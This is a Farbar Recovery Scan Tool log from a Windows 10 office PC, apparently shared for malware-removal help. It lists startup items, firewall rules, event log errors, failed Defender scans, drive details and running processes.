HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Common Files\Intuit\QBPOSSDKRuntime;C:\Program Files (x86)\HP\IdrsOCR_15.2.10.1114\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Spices\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\JA.jpg
HKU\S-1-5-21-1001776605-1151265979-3107129937-1002\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: ccleaner => 2
MSCONFIG\Services: CCleanerBrowserElevationService => 3
MSCONFIG\Services: ccleanerm => 3
MSCONFIG\Services: cphs => 3
MSCONFIG\Services: GoogleChromeElevationService => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: HPPrintScanDoctorService => 2
MSCONFIG\Services: iaStorAfsService => 3
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: QBCFMonitorService => 2
MSCONFIG\Services: QBFCService => 3
MSCONFIG\Services: QBVSS => 2
MSCONFIG\Services: QuickBooksDB27 => 3
MSCONFIG\Services: RstMwService => 2
MSCONFIG\Services: SDScannerService => 2
MSCONFIG\Services: SDUpdateService => 2
MSCONFIG\Services: TeamViewer => 2
HKLM\...\StartupApproved\StartupFolder: => "Intuit Data Protect.lnk"
HKLM\...\StartupApproved\StartupFolder: => "QuickBooks Update Agent.lnk"
HKLM\...\StartupApproved\StartupFolder: => "QuickBooks_Standard_21.lnk"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "TeamsMachineInstaller"
HKLM\...\StartupApproved\Run32: => "SDTray"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "GoogleDriveSync"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "com.squirrel.Teams.Teams"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "CCleanerBrowserAutoLaunch_EBA6280FE373BC45FCF9CDB43D2FE029"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_B33159A89B3D11FEC37F658395A0456B"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "GoogleDriveFS"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "prueba"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{995540E7-DBA9-4543-91CB-2DE90AE50AD3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\qblaunch.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{FCF230FD-6240-4705-A533-03FDC5E9F371}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\qblaunch.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{79263838-C0DF-482B-8D84-551E7F710BD0}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit, Inc. -> Intuit)
FirewallRules: [{16284864-0073-4013-9637-FFF1BBF3D97A}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit, Inc. -> Intuit)
FirewallRules: [{3A6B64F3-235B-456D-9A5A-B649638F8D82}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{5E4BE705-E5DB-448F-90AD-08885A66159F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{021ED30E-C7E4-4894-8198-D1B3F88A36BD}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{75C41CBD-78B1-4083-BAF2-C29630A300F7}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{9BE43288-3223-4452-BB87-F03340C60331}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{2E49300B-0B50-49C0-A319-980136628816}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{1C815135-710D-4E5C-B9F4-2E755DE0A666}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (SAP -> SAP AG or an SAP affiliate company)
FirewallRules: [{B4427F78-1A26-4F8B-B763-6A8EF1292AE3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (SAP -> SAP AG or an SAP affiliate company)
FirewallRules: [{793E310A-D0E6-4480-A15E-B5A5B6A42A47}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{B2E5E52A-8379-4DFE-AD27-10B55CCA0652}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{4BB8F53B-E890-443D-B4CD-13682CD7B534}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{EDAB2953-4472-4043-B744-F8D659844BA6}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{686EC7D2-EC8D-43DD-918D-A12E1A32CDBE}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\bin\EWSProxy.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{D2446537-5F75-4E55-B9FA-7CBCB6EE79FC}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\bin\FaxApplications.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{533B2128-4584-4E0D-9A33-FC36D516FF36}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{42D2A4B3-1717-4CC5-A46D-94661F92FB49}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\bin\SendAFax.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{29F6DC2E-935C-4ACB-A6A3-535DED85D2B3}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\bin\FaxPrinterUtility.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{64F37FC5-9682-488F-B7A1-E33537529E3C}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{CFF24E33-06E2-417A-ADE7-E746B0359CBB}] => (Allow) LPort=5357
FirewallRules: [{ACC4DF4B-3E22-452B-B664-E96DA333E11E}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{7A01A7FC-30F2-43E6-AB8E-E4AAF0F3E2BA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6D59EC30-DCE0-4F4B-94CB-CA71DD2FCC25}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{3A2F14C4-F5EB-4B15-9A4E-D4DEB3E66BFA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{2B9484E4-C3F4-4EAA-B51F-F32A0A4D45FD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{324995A9-4E1D-4924-9EED-3526411D4278}C:\program files\avast software\avast\avastui.exe] => (Block) C:\program files\avast software\avast\avastui.exe => No File
FirewallRules: [UDP Query User{01061E88-0E48-41BF-BFF0-4645F1032548}C:\program files\avast software\avast\avastui.exe] => (Block) C:\program files\avast software\avast\avastui.exe => No File
FirewallRules: [{C58F96C4-A765-4AF7-926A-D4A372E2ACB5}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{C08DB9AA-4ABF-4840-8EF8-E8220B4FAE28}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{3AF2CF79-0DDA-49BA-BE27-17569546FC58}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{F81EF7F2-3ADC-4D0F-B438-2F833B5A2717}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{E23FE3B3-11B1-4853-83F0-357FC014A3EF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{431B8400-CFAB-468A-83B5-CBC5D590F2CA}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8EE19B7D-795E-413A-A71D-940BFE34D3F6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{DA87758F-C512-41DC-BB29-6D8B580B9A32}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{AB2867A3-D0AD-4AE3-8C4B-C06263DB53BF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{29DFC5DD-A680-4483-83D8-C3BA63547C58}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.79.95.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{25C3F6FD-6240-47FA-92A0-848C7C9F6BA5}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.79.95.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{C8DCC20A-B654-4C29-93CE-158A08F2CD96}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.79.95.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{45A4B1C1-6832-4D67-A2BD-97D4E566EA73}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.79.95.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{4312ED41-9163-4470-B8CD-346C9335E891}] => (Allow) C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe (Piriform Software Ltd -> Piriform Software)
FirewallRules: [{72B9F358-F9B9-44A3-9668-CB72E4A2EAA3}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\96.0.1054.62\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DF189A94-74DA-4AAF-AB02-568086C82980}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{180619A7-2EDA-4374-970C-57BBD7643BA9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{3DC94649-7F5E-4F42-927D-D682ABA8E46A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{6F63F8DE-400C-47B2-9BE7-B641B487F36D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{B34877D6-947B-44DF-A69D-43E34C8B3727}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service

==================== Restore Points =========================

20-12-2021 08:35:54 Scheduled Checkpoint
27-12-2021 10:25:58 Scheduled Checkpoint
05-01-2022 09:24:03 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============

Name: PCI Serial Port
Description: PCI Serial Port
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: ========================

Application errors:
==================
Error: (01/06/2022 08:39:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x2a80
Faulting application start time: 0x01d8031c09705ad4
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: a689181d-310d-40d4-b570-375bc3456645
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:33:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x101c
Faulting application start time: 0x01d8031b15d54ac4
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: 6c5d20c2-6f95-4e60-8bfc-70908908dfbc
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:32:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x301c
Faulting application start time: 0x01d8031b0aa3e61b
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: 2da6a4bf-e18f-4ba8-b755-99aadaf4f54e
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:32:38 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x1c64
Faulting application start time: 0x01d8031b03e78b71
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: e250fe03-924e-45c0-83b8-8e40140ac5f6
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:30:32 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x3e50
Faulting application start time: 0x01d8031ab90afced
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: 1e1ea152-fcf4-4c1e-bad5-a8d0aeb229b0
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:29:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x32ac
Faulting application start time: 0x01d8031aa3cf9cff
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: 23ffce60-ba77-4e47-949f-80a4b86bbdd9
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:23:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x2484
Faulting application start time: 0x01d80319b0364b07
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: 5dc2ca62-f68f-4222-90b3-dff184470e8f
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:22:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0xbc8
Faulting application start time: 0x01d80319a5027b1b
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: e2c44b4e-ccac-4191-87f5-344e703745d4
Faulting package full name: 
Faulting package-relative application ID:


System errors:
=============
Error: (01/05/2022 11:01:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The QBCFMonitorService service terminated unexpectedly.  It has done this 1 time(s).

Error: (12/30/2021 09:36:50 AM) (Source: Ntfs) (EventID: 137) (User: )
Description: The default transaction resource manager on volume E: encountered a non-retryable error and could not start.  The data contains the error code.

Error: (12/30/2021 09:28:48 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-RLQ6923)
Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.

Error: (12/30/2021 09:28:45 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-RLQ6923)
Description: The server {20A10BD4-0FF4-45E8-87EF-D2708E99CEAA} did not register with DCOM within the required timeout.

Error: (12/30/2021 08:31:19 AM) (Source: Ntfs) (EventID: 137) (User: )
Description: The default transaction resource manager on volume E: encountered a non-retryable error and could not start.  The data contains the error code.

Error: (12/27/2021 08:06:33 AM) (Source: Ntfs) (EventID: 137) (User: )
Description: The default transaction resource manager on volume E: encountered a non-retryable error and could not start.  The data contains the error code.

Error: (12/27/2021 07:47:29 AM) (Source: Ntfs) (EventID: 137) (User: )
Description: The default transaction resource manager on volume E: encountered a non-retryable error and could not start.  The data contains the error code.

Error: (12/22/2021 08:44:51 AM) (Source: Ntfs) (EventID: 137) (User: )
Description: The default transaction resource manager on volume E: encountered a non-retryable error and could not start.  The data contains the error code.


Windows Defender:
================
Date: 2022-01-05 09:58:02
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2022-01-04 10:16:28
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2022-01-03 09:45:20
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2022-01-02 11:36:57
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2022-01-01 11:36:57
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Event[0]:

Date: 2021-12-10 09:44:46
Description: 
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New security intelligence Version: 
Previous security intelligence Version: 1.355.38.0
Update Source: Microsoft Update Server
Security intelligence Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.18800.4
Error code: 0x8024001e
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 

CodeIntegrity:
===============
Date: 2022-01-06 08:41:02
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\ESET\ESET Security\eamsi.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2022-01-06 07:51:18
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\ImmersiveControlPanel\SystemSettings.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive File Stream\54.0.2.0\crashpad_handler.exe that did not meet the Microsoft signing level requirements.


==================== Memory info =========================== 

BIOS: Dell Inc. A07 09/10/2011
Motherboard: Dell Inc. 0VNP2H
Processor: Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz
Percentage of memory in use: 45%
Total physical RAM: 8072.89 MB
Available physical RAM: 4424.1 MB
Total Virtual: 9456.87 MB
Available Virtual: 4957.69 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:930.47 GB) (Free:857.97 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:74.53 GB) (Free:0 GB) NTFS
Drive f: () (Removable) (Total:7.49 GB) (Free:7.48 GB) FAT32

\\?\Volume{1549f232-0000-0000-0000-100000000000}\ (System Reserved) (Fixed) (Total:0.54 GB) (Free:0.5 GB) NTFS
\\?\Volume{1549f232-0000-0000-0000-60c0e8000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 1549F232)
Partition 1: (Active) - (Size=549 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=517 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 74.5 GB) (Disk ID: AE32AE32)
Partition 1: (Not Active) - (Size=74.5 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt =======================

FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-12-2021
Ran by Spices (administrator) on DESKTOP-RLQ6923 (Dell Inc. OptiPlex 990) (06-01-2022 08:40:38)
Running from C:\Users\Spices\OneDrive\Documents\OneDrive\Desktop
Loaded Profiles: Spices & QBDataServiceUser27
Platform: Microsoft Windows 10 Pro Version 21H1 19043.1415 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(ESET, spol. s r.o. -> ESET) C:\Program Files\ESET\ESET Security\eguiProxy.exe
(ESET, spol. s r.o. -> ESET) C:\Program Files\ESET\ESET Security\ekrn.exe
(Google LLC -> ) C:\Program Files\Google\Drive File Stream\54.0.2.0\crashpad_handler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Calculator.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20544.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20544.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
(Piriform Software Ltd -> Piriform Software) C:\Program Files (x86)\CCleaner Browser\Update\1.8.1067.0\CCleanerBrowserCrashHandler.exe
(Piriform Software Ltd -> Piriform Software) C:\Program Files (x86)\CCleaner Browser\Update\1.8.1067.0\CCleanerBrowserCrashHandler64.exe
(Safer-Networking Ltd. -> Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(SAP -> SAP AG or an SAP affiliate company) C:\Program Files (x86)\Intuit\QuickBooks 2017\QBDBMgrN.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Desktop.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\tv_w32.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\tv_x64.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [HotKeysCmds] => "C:\WINDOWS\system32\hkcmd.exe" (No File)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Security\ecmds.exe [167496 2021-12-10] (ESET, spol. s r.o. -> ESET)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601928 2018-12-15] (Oracle America, Inc. -> Oracle Corporation)
